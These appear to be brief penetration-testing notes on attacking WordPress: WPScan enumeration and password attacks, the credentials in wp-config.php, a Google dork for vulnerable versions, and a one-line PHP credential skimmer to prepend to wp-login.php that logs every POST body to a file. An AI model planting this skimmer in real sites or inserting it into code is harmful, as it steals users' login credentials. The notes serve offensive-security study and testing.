WordPress
WPscan:
Interesting features:
Enumerate directories, users
Password attacks
Scan for vulns in core, plugins, themes
WordPress files:
wp-config.php: Has password
WP Credential Skimming:
This attack needs backdoor access. In htdocs, edit the wp-login.php file with a new line added to the start of the file: <?php file_put_contents('log.txt', file_get_contents('php://input'));?>
This will capture all incoming POSTs and save them into a txt file in the htdocs folder. We would then see captured input in the file when people login or do other interesting POST activity.
Google Dork for vuln versions. Example: "error_log" inurl:/wp-content
Look for vulnerable plugins:
Last updated
